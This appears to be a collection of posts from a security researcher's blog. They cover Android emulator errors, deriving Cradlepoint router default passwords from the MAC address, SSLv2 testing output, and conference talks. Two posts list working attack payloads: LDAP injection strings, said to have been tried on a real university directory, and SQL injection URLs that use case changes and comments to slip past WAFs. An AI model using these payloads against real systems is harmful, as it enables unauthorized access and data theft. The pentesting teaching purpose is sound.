Android Emulator - Pentesting - Encountered Errors

The "INSTALL_FAILED_MISSING_SHARED_LIBRARY" is a very common problem which is encountered normally in day to day operations. This error is legitimately thrown by the android emulator when a new application is forced to install for testing purposes.

This error is an outcome of inappropriate selection of Android API or Google API. The application might require either of the API's. If your Android Virtual Device (AVD) is build to use one of it , you are going to face this problem.

For example: let's have a look at this emulator



and now we want to install, anti toolkit on it which results in following error



The next step, we tried this -



The result is as expected



Always provide appropriate partition size for AVD to avoid any stringency while testing.

Hacking Cradle Point Routers - Obscurity at the Peak

Cradle-point wireless routers are used heavily for setting small networks. However, Cradle-point uses interesting MAC specific authentication credentials which are unique for every router because of the MAC address uniqueness. In general, Cradle-point opts this behavior in order to provide more entropy in the authentication scheme rather depending on default password mechanism, which most of the LAN/WLAN router uses.

Cradle-point uses last six characters of MAC address for authentication by default. Well, in general it seems interesting because it looks like things are more secure. However, this is not appropriate from security point of view. For administrative logins and user authentication for the first time, a login page is displayed that looks for internet access password.

The question is; How to get the password for unmanaged routers? Well, it is in MAC address. However, the obscure part is, once you are inside a WLAN , you are already having an IP address. It means Address Resolution Protocol (ARP) is the key that maps the network layer address (IP) to the link layer(Ethernet/MAC). The login page looks like as follows



The designers made a mistake in setting this type of layout because in order to get the administrative webpage, the client has to connect to the network if it is active. Right!. Yes it is. Once a user activates the wireless connection it gets connected to the same WLAN which has a gateway address of 192.168.0.1 (default for Cradle-point routers). It is hilarious but it is trivial to subvert the stuff to get the password. Now, the hacker is in the network, so we can get possible ARP entry which resolute the IP address to the MAC address (simply ping the gateway) for the router.



As per the documentation, the password has to be 071640. Let’s try



So ..........



Configure your devices in a secure manner.

Virus Bulletin - Talk

Check out my virus bulletin talk - http://www.virusbtn.com/conference/vb2011/590oYHwdzKZp/abstracts/Sood.xml

OWASP Talk - The Good Hacker - Hunting Web Malware

The Good Hacker:Dismantling Web Malware with Aditya K Sood & Richard J Enbody, SecNiche Security Labs, Michigan State University from OWASP on Vimeo.

BruCon 2011 - Botnets and Browsers

I presented at BruCon 2011 on Botnets and Browsers.

BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in the Ghost Shell)

View more presentations from Aditya K Sood

A nice writeup is here - http://blog.c22.cc/2011/09/20/brucon-botnets-and-browsers-brothers-in-a-ghost-shell/

Enjoy !

Source Seattle 2011 - Video Up - Art of InfoJacking

In May , I presented about Art of InfoJacking in Source Seattle. The video can be seen here.

PenTest Magazine - Breaking Down i*{Devices} - Testing iPhone Security

Smartphones have revolutionized the world. The online world is grappling with severe security and privacy issues. The smartphone applications require an aggressive approach of security testing and integrity verification in order to serve the three metrics of security such as confidentiality, integrity and availability.

This paper sheds a light on the behavioral testing and security issues present in Apple’s IOS devices and applications. Primarily, this paper revolves around penetration testing of iPhone device and its applications. The paper does not discuss the iPhone application source code analysis and reverse engineering.

Download the magazine from : HERE

PenTest Magazine Teaser - Mobile Hacking

View more documents from Aditya K Sood

Dissecting Java Server Faces for Penetration Testing

This paper sheds light on the findings of security testing of Java Server Faces. JSF has been widely used as an open source web framework for developing efficient applications using J2EE. JSF is compared with ASP.NET framework to unearth potential security flaws.

This paper is an outcome of my work at Cigital Labs. It is a collaborative work with Security Compass team.

Download : http://www.cigital.com/papers/download/dissecting_jsf_pt_aks_kr.pdf

Dissecting Java Server Faces for Penetration Testing

View more documents from Aditya K Sood

Enjoy!

Elsevier CFS - The State of Declarative Security in Banking Websites

The State of Declarative Security in HTTP Response Headers - Bank Study

View more documents from Aditya K Sood

User Agent / SSL Version and SSL2_READ_INTERNAL:bad mac decode

During SSL version verification and testing, one might encounter different issues on different platforms. The output greatly depends on the type of User agent is used and the SSL configuration parameters on server side. In certain scenarios, one might encounter SSL2_READ_INTERNAL:bad mac error while testing for SSLv2 on the server. For example: let's have a look the example below

[Request/Response - 1]

root@bt:~# curl -v -2 https://www.examplebank.com:443 -k
* About to connect() to www.examplebank.com port 443 (#0)
* Trying ... connected
* Connected to examplebank.com port 443 (#0)
* successfully set certificate verify locations:
* CAfile: none
CApath: /etc/ssl/certs
* SSLv2, Client hello (1):
* SSLv2, Server hello (4):
* SSLv2, Client key (2):
* SSLv2, Client finished (3):
* error:140EC071:SSL routines:SSL2_READ_INTERNAL:bad mac decode
* Closing connection #0

root@bt:~# openssl s_client -connect www.examplebank.com:443 -ssl2
CONNECTED(00000003)
depth=0 /1.3.6.1.4.1.311.60.2.1.3=US/1.3.6.1.4.1.311.60.2.1.2=Delaware/2.5.4.15=Private Organization/serialNumber=2927442/C=US/postalCode=75202/ST=Texas/L=Dallas/streetAddress=1201 Main Street/O=Bank Corporation/OU=WebSphere Ecomm
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 /1.3.6.1.4.1.311.60.2.1.3=US/1.3.6.1.4.1.311.60.2.1.2=Delaware/2.5.4.15=Private Organization/serialNumber=2927442/C=US/postalCode=75202/ST=Texas/L=Dallas/streetAddress=1201 Main Street/O= Bank/OU=WebSphere Ecomm
verify error:num=27:certificate not trusted
verify return:1
depth=0 /1.3.6.1.4.1.311.60.2.1.3=US/1.3.6.1.4.1.311.60.2.1.2=Delaware/2.5.4.15=Private Organization/serialNumber=2927442/C=US/postalCode=75202/ST=Texas/L=Dallas/streetAddress=1201 Main Street/O=Bank /OU=WebSphere Ecomm
verify error:num=21:unable to verify the first certificate
verify return:1
2170:error:140EC071:SSL routines:SSL2_READ_INTERNAL:bad mac decode:s2_pkt.c:274:


[Request/Response - 2]
root@bt:~# curl -v -2 https://examplebank.com:443 -k
* About to connect() to examplebank.com port 443 (#0)
* Trying ... connected
* Connected to examplebank.com (171.159.228.150) port 443 (#0)
* successfully set certificate verify locations:
* CAfile: none
CApath: /etc/ssl/certs
* SSLv2, Client hello (1):
* Unknown SSL protocol error in connection to examplebank.com.com:443
* Closing connection #0
curl: (35) Unknown SSL protocol error in connection to examplebank.com:443

root@bt:~# openssl s_client -connect examplebank.com:443 -ssl2
CONNECTED(00000003)
2179:error:1407F0E5:SSL routines:SSL2_WRITE:ssl handshake failure:s2_pkt.c:428:

The above presented response information is from the same target. The first request has "www" prefix appended to the domain name and second request is without "www" prefix.

The first case results in half handshake and server side verification fails. This error usually occurs when server detects a specific padding option chosen for the the protocol version (SSLv2 in this case). It typically looks like a Protocol Rollback Attack. The server only negotiates successfully when only SSLv2 is enabled on the server. However, hostname (www.examplebank.com) also plays a role because there is always a SSL redirection implemented on the server side.

The second case simply rejects the SSLv2 handshake. The hostname (examplebank.com) is used does not have "www" prefix. The point is while testing SSL version different errors should be fuzzed appropriately before raising a red flag.

Enjoy!

LDAP Injection - CN /SN /UID /MAIL - Attack Payloads

LDAP injections are detected very less as compared to XSS attacks. However, every injection is critical from security point of view. Recently I came across one of the biggest educational university that has implemented LDAP for its directory services. With no reasonable doubt it was vulnerable to LDAP injections. It was fun to play around with it. For security purposes, I am not going to show the successful injection snapshots (figure it out yourself) but only present the payloads and brief queries.

It is the most common example of searching username in the directories. The website has search form with different name fields. On some HTTP debugging, the form is submitting these variables.

sn cn uid mail full 0 submit Search

Considering the set of variables, the most generic implementation of LDAP filter looks as presented below
(&(objectClass=Person)(|(sn=John)(cn=Woo*)))

One might encounter following errors

1. There was an error connecting to the server.Please try again.

2. You have not entered anything to search on. There were 0 matches to your query.
Please return to the search page to reformulate your query.

3. 500 Internal Server Error

4. Successful query

Attack payloads:

/cgi-bin/ldap/ldap_query.cgi?cn=)))
/cgi-bin/ldap/ldap_query.cgi?cn=john*)(|mail=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)(|(mail=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)(|(password=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)(|(uid=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)(|uid=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)(|(uid=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)(|(userpassword=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*
/cgi-bin/ldap/ldap_query.cgi?cn=*
/cgi-bin/ldap/ldap_query.cgi?cn=(&(objectClass=Person)(|(sn=John)(cn=Woo*)))
/cgi-bin/ldap/ldap_query.cgi?cn=*) (|(objectClass=person)
/cgi-bin/ldap/ldap_query.cgi?cn=*)(cn=*))(|(cn=*
/cgi-bin/ldap/ldap_query.cgi?cn=*)(|(cn = * ))
/cgi-bin/ldap/ldap_query.cgi?cn=*)(|(uid = * ))

Meta Characters - ))|\\\\ |!@#$ &&

There are other set of payloads that can be used. The output of one of the injection looks like as presented below



Enjoy !

SQL Injection (Primer 2) - Collation / Case Insensitive and WAF bypassing

SQL injections are prevalent in all type of scenarios. With the advent of Web application Firewalls (WAF's) there are number of protection mechanisms that have been developed to prevent injections. WAF's are good solutions but these are not that good enough to prevent advanced level of SQL injections. However, during the course of my experience, I have noticed case sensitive / insensitive plays a critical role in designing bypasses.

The SQL queries are case insensitive. This feature of SQL databases (MySQL/ MSSQL)
helps a lot in designing WAF bypasses. The reason is, WAF's are mainly signature specific in most of cases which are explicitly written. By default, regular expressions are case sensitive. It is also possible to control case sensitivity within a pattern using the inline modifier (?i). However, it makes the signature really complex and hard to manage in certain scenarios. But this applied procedure is not hard to implement.

Note: The examples are taken from the real time websites and applications. The websites names have been masked for security purposes.

For example, the following SQL injection is usually filtered by the WAF in number of cases.
http://www.example.com/news_political.php?recordID=100+and+1=2+union+all+select+1,2,concat(Count(*)),4,5,6+from+information_schema.table_constraints--

The point is to break the filter at any one point so that whole of regular expression fails. The following code allows

http://www.example.com/news_political.php?recordID=100+aNd+1=2+uNioN+aLl+sElecT+1,2,CoNcaT(Count(*)),4,5,6+fRoM+information_schema.table_constraints--

In the above presented SQL injection, case sensitive approach is used to bypass WAF and at last case insensitive approach is exploited in order to render injection successfully. This injection can further by obfuscated using meta characters (/* ! */) , // , # +- , ; , # as pointed below

http://www.example.com/news_political.php?recordID=100/*!+aNd*/+1=2+uNioN+aLl+sElecT+1,2,CoNcaT(Count(*)),4,5,6+fRoM+information_schema.table_constraints--

One can design plethora of combinations based on the above discussed specifications in order to test for SQL injections in different environments.

All the informational issues discussed above are usually due to case insensitive nature of databases. There is a way, one can write SQL queries that are case sensitive using Collation procedure in databases. You can check for collations here. However, this process depends on the application design. It is something that developers implement by choice or when it is critically required.

Follow this !